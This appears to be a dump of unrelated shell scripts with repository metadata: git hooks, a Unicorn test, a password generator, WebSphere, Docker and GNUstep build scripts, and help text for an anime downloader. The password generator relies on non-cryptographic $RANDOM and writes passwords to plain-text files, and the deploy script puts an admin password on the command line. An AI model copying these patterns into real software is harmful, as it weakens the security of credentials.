        sed "s/$PARAM *= *[0-9]*\.*[0-9]*/$PARAM = $newparam/" "$FILE" > "$NEWPROP"
        sh "$SELF/run.sh" "$TYPE" "$NEWPROP" | grep = | awk '{print $NF}'
        cp simulator.log "simulator_${PARAM}-${newparam}_RUN-${i}.log"
        rm -f "$NEWPROP"
    done
done
| true
|
a3190a350c44a3b274be64f2cb72baebef5a4ee8
|
Shell
|
tadasv/git-hooks
|
/post-commit
|
UTF-8
| 828
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# An example hook script that is called after a successful
# commit is made.
#
# To enable this hook, rename this file to "post-commit".

# Keep history of commits: append "<hash> <timestamp> <byte delta> <subject>"
# for the new commit to a per-day log file.
# TODO move this into a separate script
. git-sh-setup

# Net byte delta of HEAD: sum per-file size changes from git diff-tree.
# Columns read per line: A=src mode, B=dst mode, C=src blob, D=dst blob,
# M=status letter, P=path.  Only M(odified)/A(dded)/D(eleted) contribute.
TOTAL_DIFF=`git diff-tree --no-prefix -r HEAD | {
	total=0
	while read A B C D M P
	do
		case $M in
			M) bytes=$(( $(git cat-file -s $D) - $(git cat-file -s $C) )) ;;
			A) bytes=$(git cat-file -s $D) ;;
			D) bytes=-$(git cat-file -s $C) ;;
			*)
				continue
				;;
		esac
		total=$(( $total + $bytes ))
	done
	echo $total
}`

# NOTE(review): log destination is hard-coded to one user's home; this
# hook only works as-is on that machine.
COMMIT_LOG_FOLDER=/Users/tadas/logs/git
LOG_FILE=`date +commits-%Y-%m-%d.log`
LAST_COMMIT=`git log --pretty=format:"%H %ct ${TOTAL_DIFF} %s" -n 1`

mkdir -p ${COMMIT_LOG_FOLDER}
echo ${LAST_COMMIT} >> ${COMMIT_LOG_FOLDER}/${LOG_FILE}
| true
|
eb6bf2fb7e78f5eb86808cb908cd66c12d9e9657
|
Shell
|
joelmahoney/discoverbps
|
/.gems/gems/unicorn-4.8.2/t/t0007-working_directory_no_embed_cli.sh
|
UTF-8
| 925
| 2.890625
| 3
|
[
"GPL-3.0-or-later",
"GPL-1.0-only",
"GPL-2.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-public-domain",
"GPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"MIT"
] |
permissive
|
#!/bin/sh
# Unicorn integration test: a config.ru located inside an alternate
# working_directory (set via the config file, not embedded CLI switches)
# must be found, and the master must daemonize (ppid == 1 in before_fork).
. ./test-lib.sh
t_plan 4 "config.ru inside alt working_directory (no embedded switches)"

t_begin "setup and start" && {
	unicorn_setup
	rm -rf $t_pfx.app
	mkdir $t_pfx.app
	cat > $t_pfx.app/config.ru <<EOF
use Rack::ContentLength
use Rack::ContentType, "text/plain"
run lambda { |env| [ 200, {}, [ "#{\$master_ppid}\\n" ] ] }
EOF
	# the whole point of this exercise
	echo "working_directory '$t_pfx.app'" >> $unicorn_config
	# allows ppid to be 1 in before_fork
	echo "preload_app true" >> $unicorn_config
	cat >> $unicorn_config <<\EOF
before_fork do |server,worker|
  $master_ppid = Process.ppid # should be zero to detect daemonization
end
EOF
	# Start from / to prove the working_directory directive is honoured.
	cd /
	unicorn -D -c $unicorn_config
	unicorn_wait_start
}

t_begin "hit with curl" && {
	body=$(curl -sSf http://$listen/)
}

t_begin "killing succeeds" && {
	kill $unicorn_pid
}

# The app echoed $master_ppid captured in before_fork; 1 proves the
# master was re-parented to init, i.e. it daemonized.
t_begin "response body ppid == 1 (daemonized)" && {
	test "$body" -eq 1
}

t_done
| true
|
fceed27116de321da76c81bc050efc763e8b222d
|
Shell
|
durianpeople/SoalShift_modul1_E03
|
/soal3.sh
|
UTF-8
| 510
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# Print one random character of $1 followed by a random numeric sort key.
choose() {
    printf '%s %s\n' "${1:RANDOM%${#1}:1}" "$RANDOM"
}
# Build a 12-character password guaranteed to contain at least one digit,
# one lowercase and one uppercase letter: pick those three first, add nine
# more characters from the full alphanumeric set, then shuffle the lines
# with "sort -R" and keep only the character column (awk's $1 drops the
# $RANDOM values choose emits as a second column).
# NOTE(review): with sort -R the second column is unused — it looks like a
# leftover sort key from an earlier numeric-sort approach; confirm.
pass="$({ choose '0123456789'
choose 'abcdefghijklmnopqrstuvwxyz'
choose 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in $( seq 1 $(( 9 )) )
do
choose '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
done
} | sort -R | awk '{printf "%s",$1}')"
# Write the generated password to the first unused Password<N>.txt slot.
# NOTE(review): destination is hard-coded to one user's Documents folder.
flag=1
while true
do
	if [ ! -f /home/akmal/Documents/Password$flag.txt ]
	then
		echo $pass > /home/akmal/Documents/Password$flag.txt
		break
	else
		# Slot taken — try the next index.
		flag=$((flag + 1))
	fi
done
| true
|
8ad4ae42eecd376ca2e5f7e477dbac88bb2ff224
|
Shell
|
JaganMandalapu/websphere_automation
|
/was/deploy/deployApp.sh
|
UTF-8
| 2,191
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# This scripts calls installApp.py script to install an application to a JVM
# Usage: deployApp.sh <install|update> <was_version> <app> <business_area> \
#        <jndi> <db_user> <db_password>

source /data/shared_scripts/resources.sh

ID=$(id -un)
WAS_VERSION=$2 #was9
APP_NAME=$3
BUSINESS_AREA=$4
JNDI=$5
DB_USER=$6
DB_PASSWORD=$7
APP_SERVER_NAME=${APP_NAME}_appserver
HOST_NAME=$(hostname -s)
NODE_NAME=${HOST_NAME}Node_${BUSINESS_AREA}

ear_dir=/data/apps/${APP_NAME}/${WAS_VERSION}/deploy
# Newest file in the deploy directory.  "ls -t | head -1" replaces the
# original array slicing of "ls -lrt" output, which tokenized the whole
# long listing (permissions, sizes, the "total" line, ...).
ear_file=$(ls -t "$ear_dir" 2>/dev/null | head -n 1)
ear=$ear_dir/$ear_file

installApp_script=/data/shared_scripts/deploy/installApp.py
updateApp_script=/data/shared_scripts/deploy/updateApp.py
startSingleServer_script=/data/shared_scripts/deploy/startSingleServer.py
stopSingleServer_script=/data/shared_scripts/deploy/stopSingleServer.py

# Refuse to run under any account other than the designated service user.
if [ "$ID" != "$RUN_AS_ID" ] ; then
	echo "The script needs to be run as $RUN_AS_ID"
	echo "Exiting now.."
	exit 1
fi

if [[ $APP_NAME == "" ]] ; then
	echo
	echo "Application name cannot be empty!"
	exit 1
fi
installApp() {
	# Installing the application via wsadmin, then bounce the JVM so the
	# newly installed application is picked up.
	# NOTE(review): -password on the command line is visible in `ps`.
	$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
	$installApp_script $APP_NAME $ear $NODE_NAME $APP_SERVER_NAME $JNDI $DB_USER $DB_PASSWORD ${APP_NAME}_vhost
	stopAppServer
	startAppServer
}
updateApp() {
	# Update the appliaction in place with the newest EAR, then bounce
	# the JVM so the update takes effect.
	$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
	$updateApp_script $APP_NAME $ear
	stopAppServer
	startAppServer
}
stopAppServer() {
	# Stop the JVM; the fixed sleep gives WebSphere time to shut down
	# before the caller proceeds.
	$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
	$stopSingleServer_script $NODE_NAME $APP_SERVER_NAME
	sleep 30
}
startAppServer() {
	# Start the JVM; the fixed sleep gives WebSphere time to come up
	# before the caller proceeds.
	$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
	$startSingleServer_script $NODE_NAME $APP_SERVER_NAME
	sleep 30
}
# Dispatch on the requested action.
case "$1" in
	install)
		echo
		echo "Installing the $APP_NAME application"
		echo
		installApp
		;;
	update)
		echo
		echo "Updating the $APP_NAME application"
		echo
		updateApp
		;;
	*)
		# Unknown/missing action: print usage and fail, so wrapper scripts
		# and CI can detect the misuse from the exit status (the original
		# fell through and exited 0).
		echo
		echo "Usage: $0 [install|update]"
		exit 1
		;;
esac
| true
|
70025f884edcb09d515078caa9c0a3ea8e11ce96
|
Shell
|
hacktoolkit/mac-bootstrap
|
/bin/ssh-start.sh
|
UTF-8
| 640
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# Start a per-host ssh-agent, persist its environment into a sourceable
# file, and add every private key found next to a ~/.ssh/*.pub file.

if [ -z "$SSH_AGENT_FILENAME" ]; then
    SSH_AGENT_FILENAME="$HOME/.ssh-vars.$HOSTNAME.sh"
fi

touch "$SSH_AGENT_FILENAME"
ssh-agent -s > "$SSH_AGENT_FILENAME"
chmod a+x "$SSH_AGENT_FILENAME"
# Strip ssh-agent's trailing "echo Agent pid ..." line so sourcing the
# file later stays silent.
perl -i -n -e 'print $_ unless /^echo/' "$SSH_AGENT_FILENAME"
source "$SSH_AGENT_FILENAME"

#ssh-add
# $KEYS holds a glob; it is expanded unquoted on purpose in the for loop.
KEYS="$HOME/.ssh/*.pub"
for pubkey in $KEYS
do
    # The matching private key is the pubkey path minus its .pub suffix.
    PRIV_KEY=${pubkey%.*}
    if [ -e "$PRIV_KEY" ]
    then
        echo Adding to keychain: "$PRIV_KEY"
        # -K also stores the passphrase in the macOS keychain.
        ssh-add -K "$PRIV_KEY"
        #keychain -q ${PRIV_KEY}
    fi
done
| true
|
b5bd8e6f7c48d3657aa550425cf07bbce5fc5ca0
|
Shell
|
rogeriopradoj/dunit-images
|
/vectorface-dunit/build-all.sh
|
UTF-8
| 1,799
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build, squash and push every VectorFace PHP/HHVM Docker image.

docker pull debian:squeeze
docker pull debian:wheezy

# Id of the image's newest layer.
top_layer() {
    docker history -q "$1" | head -n 1
}

# Squash image $1 down to the layers above base image $2, re-tagging it
# in place (docker-squash streams through /var/run/shm to avoid disk I/O).
squash() {
    docker save "$(top_layer "$1")" \
        | sudo TMPDIR=/var/run/shm docker-squash -t "$1" -from "$(top_layer "$2")" \
        | docker load
}

# php 5.2 (squeeze based)
docker build -t vectorface/php5.2 ./php5.2
squash vectorface/php5.2 debian:squeeze
docker push vectorface/php5.2

# php-base
docker build -t vectorface/php-base ./php-base
squash vectorface/php-base debian:wheezy
docker push vectorface/php-base

# hhvm-base
docker build -t vectorface/hhvm-base ./hhvm-base
squash vectorface/hhvm-base debian:wheezy
docker push vectorface/hhvm-base

# php 5.3, 5.4, 5.5, 5.6, nightly
for version in php5.3 php5.4 php5.5 php5.6 php-nightly
do
    docker build -t vectorface/$version ./$version
    # php 5.3 cannot be squashed right now
    if [ "$version" != "php5.3" ]; then
        squash "vectorface/$version" vectorface/php-base
    fi
    docker push vectorface/$version
done

# hhvm and hhvm-nightly
for version in hhvm hhvm-nightly
do
    docker build -t vectorface/$version ./$version
    squash "vectorface/$version" vectorface/hhvm-base
    docker push vectorface/$version
done
| true
|
0969ea71d330ded080567ccc69543cbf9b08a2dc
|
Shell
|
seanpm2001/GNUStep_Tools-Installers
|
/nsis/native-compile.sh
|
UTF-8
| 10,910
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
# Semi-automatic, useful reminder for how to native compile packages
# Work in progress. Need to clean this up and make it useful...
#
# Usage:
# ./native-compile.sh [gnustep] [all | libffi | objc | make | base | gui | back]
# - default (no args) compile only dependencies (xml, etc)
# gnustep - compile only gnustep core
# all - compile all gnustep (including libffi, objc)
# xxx - compile specific package
# Location of sources, packages, etc. Change to suit
# Location of sources, packages, etc. Change to suit
HOME_DIR=/z/Source/nsis
PACKAGE_DIR=$HOME_DIR/packages      # per-package DESTDIR install trees
SOURCES_DIR=$HOME_DIR/sources       # unpacked dependency sources
GNUSTEP_DIR=$HOME_DIR/sources/gstep/current  # GNUstep release tarballs
# Clean, configure, build and install the dependency named in $PACKAGE
# (configure flags in $PACKAGE_CONFIG), then stage a second install into
# $PACKAGE_DIR/$PACKAGE for packaging.  On failure sets gsexitstatus=1
# and returns so the caller can decide what to do.
make_package()
{
	echo "Cleaning $PACKAGE"
	# Relies on the glob matching exactly one versioned source directory.
	cd $SOURCES_DIR/build/${PACKAGE}*
	if [ -f config.status ]; then
		#make distclean
		make clean
	fi
	# FIXME: Need a patch for p11-kit (trying to link an .so file in ./p11-kit)
	if [ $PACKAGE = icu ]; then
		#patch -N -p1 -i < ../../icu4c-4_6-mingw-gnustep.diff
		# ICU's configure lives in its "source" subdirectory.
		cd source
	fi
	echo "Configuring $PACKAGE"
	# zlib has no configure step (built via its win32 makefile below).
	if [ $PACKAGE != zlib ]; then
		if [ $PACKAGE = jpeg ]; then
			# Need this as gcc 4.6 screws up longjmp when there is no frame pointer
			# http://gcc.gnu.org/ml/gcc/2011-10/msg00324.html
			CFLAGS="-g -O2 -fno-omit-frame-pointer" ./configure --prefix=/mingw $PACKAGE_CONFIG
		elif [ $PACKAGE = mman ]; then
			./configure --prefix=/mingw
		else
			./configure --prefix=/mingw $PACKAGE_CONFIG
			gsexitstatus=$?
			if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
				gsexitstatus=1
				return
			fi
		fi
	fi
	echo "Making $PACKAGE"
	if [ $PACKAGE = zlib ]; then
		#make -f win32/Makefile.gcc CFLAGS="$CFLAGS"
		make -f win32/Makefile.gcc
	else
		make
	fi
	gsexitstatus=$?
	if [ $gsexitstatus != 0 ]; then
		gsexitstatus=1
		return
	fi
	make install
	# Second, relocatable install into the packaging tree.
	rm -rf $PACKAGE_DIR/${PACKAGE}
	mkdir -p $PACKAGE_DIR/${PACKAGE}
	if [ $PACKAGE = jpeg ]; then
		# jpeg's install target does not create these directories itself.
		mkdir -p $PACKAGE_DIR/${PACKAGE}/bin
		mkdir -p $PACKAGE_DIR/${PACKAGE}/lib
		mkdir -p $PACKAGE_DIR/${PACKAGE}/man
		mkdir -p $PACKAGE_DIR/${PACKAGE}/man1
		make DESTDIR=$PACKAGE_DIR/${PACKAGE}/ install
	else
		make DESTDIR=$PACKAGE_DIR/${PACKAGE}/ install
	fi
}
# Flags required for Win2K and perhaps other systems
#CFLAGS="-g"
#export CFLAGS
#
# Dependancies
#
# Default mode (first arg not "gnustep"): build only the dependency
# packages, either the full default list or exactly the names given on
# the command line.  Per-package configure quirks are set before each
# make_package call.
if [ x$1 != xgnustep ]; then
	packages="libxml2 jpeg tiff libpng libgpg-error libgcrypt p11-kit nettle gnutls icu libsndfile libao"
	if [ x$1 != x ]; then
		packages=$*
	fi
	for name in $packages; do
		# Notes:
		PACKAGE=$name
		PACKAGE_CONFIG="--enable-shared"
		if [ $PACKAGE = icu ]; then
			PACKAGE_CONFIG="$PACKAGE_CONFIG --libdir=/mingw/bin --disable-strict"
		fi
		if [ $PACKAGE = gnutls ]; then
			PACKAGE_CONFIG="$PACKAGE_CONFIG --with-libgcrypt --disable-guile"
		fi
		if [ $PACKAGE = libsndfile ]; then
			#PACKAGE_CONFIG="$PACKAGE_CONFIG --disable-alsa --disable-jack --disable-sqlite --disable-shave"
			PACKAGE_CONFIG="$PACKAGE_CONFIG --disable-shave"
		fi
		if [ $PACKAGE = fontconfig ]; then
			PACKAGE_CONFIG="$PACKAGE_CONFIG --enable-libxml2"
		fi
		make_package
	done
	exit 0
fi
#
# GNUstep
#
# . /GNUstep/System/Library/Makefiles/GNUstep.sh
export GNUSTEP_INSTALLATION_DOMAIN=SYSTEM
#
# GNustep-make
#
# First pass: unpack and install gnustep-make so its GNUstep.sh
# environment can be sourced before building the other components.
#
if [ x$2 = xall -o x$2 = xmake ]; then
	echo "========= Making GNUstep Make ========="
	cd $SOURCES_DIR/gstep
	rm -rf gnustep-make-*
	tar -zxf $GNUSTEP_DIR/gnustep-make-*tar.gz
	cd gnustep-make-*
	if [ -f config.status ]; then
		make distclean
	fi
	./configure --prefix=/GNUstep -with-layout=gnustep --with-config-file=/GNUstep/GNUstep.conf
	gsexitstatus=$?
	if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
		gsexitstatus=1
		exit 1
	fi
	make install
	rm -rf $PACKAGE_DIR/gnustep-make/
	make DESTDIR=$PACKAGE_DIR/gnustep-make/ install
fi
# Load the freshly installed GNUstep build environment.
. /GNUstep/System/Library/Makefiles/GNUstep-reset.sh
. /GNUstep/System/Library/Makefiles/GNUstep.sh
if [ x$2 = xall -o x$2 = xlibffi ]; then
	#
	# libffi
	#
	echo "========= Making libffi ========="
	cd $SOURCES_DIR/gstep
	#rm -rf libffi-*
	tar -zxf $GNUSTEP_DIR/libffi-*tar.gz
	cd $SOURCES_DIR/gstep/libffi-*
	patch -N -p0 < $HOME_DIR/libffi-includes*.patch
	if [ -f config.status ]; then
		make distclean
	fi
	# Install straight into the GNUstep System domain layout.
	./configure --prefix=/GNUstep/System --libdir=/GNUstep/System/Library/Libraries --includedir=/GNUstep/System/Library/Headers --bindir=/GNUstep/System/Tools --enable-shared
	gsexitstatus=$?
	if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
		gsexitstatus=1
		exit 1
	fi
	# LN/LN_S=cp: symlinks are unreliable on this (MinGW) host.
	make LN=cp LN_S=cp
	gsexitstatus=$?
	if [ $gsexitstatus != 0 ]; then
		gsexitstatus=1
		exit
	fi
	make install
	# Relocate the DLL and headers to where GNUstep expects them.
	mv /GNUstep/System/Library/bin/*dll /GNUstep/System/Tools
	mv /GNUstep/System/Library/Libraries/libffi-3.0.13/include/* /GNUstep/System/Library/Headers
	rm -rf $PACKAGE_DIR/libffi
	mkdir -p $PACKAGE_DIR/libffi
	mkdir -p $PACKAGE_DIR/libffi/GNUstep/System/Tools
	mkdir -p $PACKAGE_DIR/libffi/GNUstep/System/Library/Libraries
	make DESTDIR=$PACKAGE_DIR/libffi install
fi
#
# GNUstep objc
#
if [ x$2 = xall -o x$2 = xobjc ]; then
	echo "========= Making objc ========="
	cd $SOURCES_DIR/gstep
	#tar -zxf $GNUSTEP_DIR/gnustep-objc-*tar.gz
	# Builds libobjc2 from the gstep-current checkout (no configure step).
	cd $SOURCES_DIR/gstep-current/libobjc2*
	make clean
	make
	gsexitstatus=$?
	if [ $gsexitstatus != 0 ]; then
		gsexitstatus=1
		exit
	fi
	make install
	# strip the dll
	#strip /GNUstep/System/Tools/objc-1.dll
	# Stage a second install for packaging.
	rm -rf $PACKAGE_DIR/gnustep-objc2
	mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Library/Libraries
	mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Library/Headers
	mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Tools
	make DESTDIR=$PACKAGE_DIR/gnustep-objc2 install
fi
#
# GNustep-make (AGAIN!)
#
# Second gnustep-make pass: reconfigure/reinstall now that libobjc2 is in
# place, reusing the directory unpacked by the first pass.
if [ x$2 = x -o x$2 = xall -o x$2 = xmake ]; then
	echo "========= Making GNUstep Make ========="
	cd $SOURCES_DIR/gstep
	#rm -rf gnustep-make-*
	#tar -zxf $GNUSTEP_DIR/gnustep-make-*tar.gz
	cd gnustep-make-*
	./configure --prefix=/GNUstep -with-layout=gnustep --with-config-file=/GNUstep/GNUstep.conf
	gsexitstatus=$?
	if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
		gsexitstatus=1
		exit 1
	fi
	make install
	rm -rf $PACKAGE_DIR/gnustep-make/
	make DESTDIR=$PACKAGE_DIR/gnustep-make/ install
fi
#
# GNUstep base
#
if [ x$2 = x -o x$2 = xall -o x$2 = xbase ]; then
echo "========= Making GNUstep Base ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-base-*
tar -zxf $GNUSTEP_DIR/gnustep-base-*tar.gz
cd gnustep-base-*
if [ -f config.status ]; then
make distclean
fi
./configure --disable-xslt --with-installation-domain=SYSTEM
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-base
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-base install
fi
#
# GNustep Gui
#
if [ x$2 = x -o x$2 = xall -o x$2 = xgui ]; then
echo "========= Making GNUstep GUI ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-gui-*
tar -zxf $GNUSTEP_DIR/gnustep-gui-*tar.gz
cd gnustep-gui-*
if [ -f config.status ]; then
make distclean
fi
./configure --with-include-flags=-fno-omit-frame-pointer
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make messages=yes install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-gui
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-gui install
fi
#
# GNUstep Back (default backend) - built when $2 is empty, "all" or "back".
#
if [ x$2 = x -o x$2 = xall -o x$2 = xback ]; then
echo "========= Making GNUstep Back ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-back-*
tar -zxf $GNUSTEP_DIR/gnustep-back-*tar.gz
cd gnustep-back-*
if [ -f config.status ]; then
make distclean
fi
./configure
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
# stage for packaging under $PACKAGE_DIR
rm -rf $PACKAGE_DIR/gnustep-back
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-back install
fi
#
# WinUXTheme - built from the gstep-current checkout (no configure step);
# selected when $2 is empty, "all" or "theme".
#
if [ x$2 = x -o x$2 = xall -o x$2 = xtheme ]; then
echo "========= Making GNUstep WinUXTheme ========="
cd $SOURCES_DIR/gstep-current
cd WinUXTheme
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/WinUXTheme
mkdir -p $PACKAGE_DIR/WinUXTheme/GNUstep/System/Library/Libraries/Themes
make DESTDIR=$PACKAGE_DIR/WinUXTheme install
fi
#
# Cairo backend - only built when explicitly requested with $2 = "cairo".
# When $3 = "all", the prerequisite graphics libraries are built first
# via make_package (defined elsewhere in this script).
#
if [ x$2 = xcairo ]; then
# Make sure to install precompiled packages:
# FIXME: bug in freetype - have to type make manually?!?!?!
# FIXME: bug in cairo - need to add -lpthread to src/Makefile (?_LIBS)
if [ x$3 = xall ]; then
packages="freetype fontconfig pixman cairo"
PACKAGE_CONFIG=
# make_package consumes the PACKAGE / PACKAGE_CONFIG globals
for name in $packages; do
PACKAGE=$name
make_package
done
fi
echo "========= Making GNUstep Back (Cairo) ========="
cd $SOURCES_DIR/gstep
cd gnustep-cairo-*
if [ -f config.status ]; then
make distclean
fi
# build gnustep-back a second time with the cairo graphics backend,
# installed under the distinct name "cairo"
./configure --enable-graphics=cairo --with-name=cairo
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-cairo
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-cairo install
fi
#
# Developer package ($2 = "devel") - currently a stub: the loop only
# assigns PACKAGE and the actual build step is still a FIXME.
#
if [ x$2 = xdevel ]; then
# Make sure to install precompiled packages:
# perl
if [ x$3 = xall ]; then
packages="autoconf libtool"
PACKAGE_CONFIG=
for name in $packages; do
PACKAGE=$name
# FIXME Need to make in /usr
done
fi
fi
| true
|
cc7af27ac7ea31a51b443e5dfcdffcb3831ffa6b
|
Shell
|
casjay-dotfiles/scripts
|
/helpers/man/anime-dl
|
UTF-8
| 3,833
| 3.4375
| 3
|
[
"WTFPL"
] |
permissive
|
#!/usr/bin/env bash
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# This is what I use for my system scripts
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##@Version : 202207042244-git
# @Author : Jason Hempstead
# @Contact : jason@casjaysdev.pro
# @License : LICENSE.md
# @ReadME : anime-dl --help
# @Copyright : Copyright: (c) 2022 Jason Hempstead, Casjays Developments
# @Created : Tuesday, Jul 05, 2022 13:46 EDT
# @File : anime-dl
# @Description : Search and download anime
# @TODO :
# @Other :
# @Resource :
# @sudo/root : no
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Set variables
APPNAME_README="anime-dl"
__heading="- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Set functions
# strip the "name : value" prefix and leading space from header lines
__sed_head() { sed 's#..* :##g;s#^ ##g'; }
# print $2 framed by the heading separator, in tput colour $1
__printf_head() { __printf_color "\n$__heading\n$2\n$__heading\n" "$1"; }
# grep @-tagged metadata lines (e.g. "@Version") out of a script found on
# PATH; NOTE(review): defaults to "systemmgr", not this script - verify
__grep_head() { grep -sE '[".#]?@[A-Z]' "$(type -P "${2:-systemmgr}")" | grep "${1:-}"; }
# print $1 wrapped in tput colour $2; tput errors are silenced so this
# degrades gracefully on dumb terminals
__printf_color() { printf "%b" "$(tput setaf "$2" 2>/dev/null)" "$1" "$(tput sgr0 2>/dev/null)"; }
# extract the first @Version value from a script on PATH
__version() { __grep_head 'Version' "$(type -P "${2:-systemmgr}")" | __sed_head | head -n1 | grep '^'; }
# Print one help line through __printf_color.
# If $1 is non-empty and purely numeric it is consumed as the colour
# number; otherwise colour 4 (blue) is used and all arguments form the
# message. A trailing newline is always appended.
__printf_help() {
  local color msg
  if [ -n "${1:-}" ] && [ -z "${1//[0-9]/}" ]; then
    color="$1"
    shift
  else
    color="4"
  fi
  msg="$*"
  __printf_color "$msg\n" "$color"
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Render the help/man text for anime-dl: header, option list, and the
# generic options shared by all casjay scripts.
printf '\n'
__printf_head "5" "$APPNAME_README: $(__grep_head "Description" "$APPNAME_README" | __sed_head)"
__printf_help " " " "
__printf_help "5" "Usage: $APPNAME_README [-c,-a,-d,-q,-v]"
__printf_help "4" "-c - continue watching anime from history"
__printf_help "4" "-a - specify episode to watch"
__printf_help "4" "-h - show helptext"
__printf_help "4" "-d - download episode"
__printf_help "4" "-p - download episode to specified directory"
__printf_help "4" "-q - set video quality (best|worst|360|480|720|1080)"
__printf_help "4" "-v - use VLC as the media player"
__printf_help "4" "-D - delete history"
__printf_help "4" "-U - fetch update from github"
__printf_help "4" "-V - print version number and exit"
__printf_help " " " "
__printf_head "5" "Other $APPNAME_README Options"
__printf_help "4" "$APPNAME_README --config - Generate user config file"
__printf_help "4" "$APPNAME_README --version - Show script version"
__printf_help "4" "$APPNAME_README --help - Shows this message"
__printf_help "4" "$APPNAME_README --options - Shows all available options"
__printf_help " " " "
#__printf_head "5" "This is a work in progress"
#__printf_help "4" "$APPNAME_README "
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# end help
printf '\n'
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# End application
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# lets exit with code
#exit "${exitCode:-0}"
| true
|
da01054d5f8b8eb9d91265b524075cf5e9be55f8
|
Shell
|
tataranovich/mc-buildbot
|
/target-build.sh
|
UTF-8
| 4,014
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# All pbuilder targets this buildbot knows how to build for ("<dist>-<arch>").
SUPPORTED_TARGETS="jessie-i386 jessie-amd64 stretch-i386 stretch-amd64 buster-i386 buster-amd64 bullseye-i386 bullseye-amd64 sid-i386 sid-amd64 trusty-i386 trusty-amd64 xenial-i386 xenial-amd64 bionic-i386 bionic-amd64 focal-amd64 groovy-amd64 hirsute-amd64"
# Set to 1 when any target fails to build; checked at the end of the script.
UNCLEAN_BUILD=0
# Print $1 via warn() and abort the whole script with status 1.
die() {
warn "$1"
exit 1
}
# Emit a "BUILDBOT:"-prefixed diagnostic on stderr.
# Stays silent when called without a message (or with an empty one).
warn() {
  if [ -n "${1:-}" ]; then
    printf 'BUILDBOT: %s\n' "$1" >&2
  fi
}
# Print an invocation example on stdout and abort with status 1.
show_usage() {
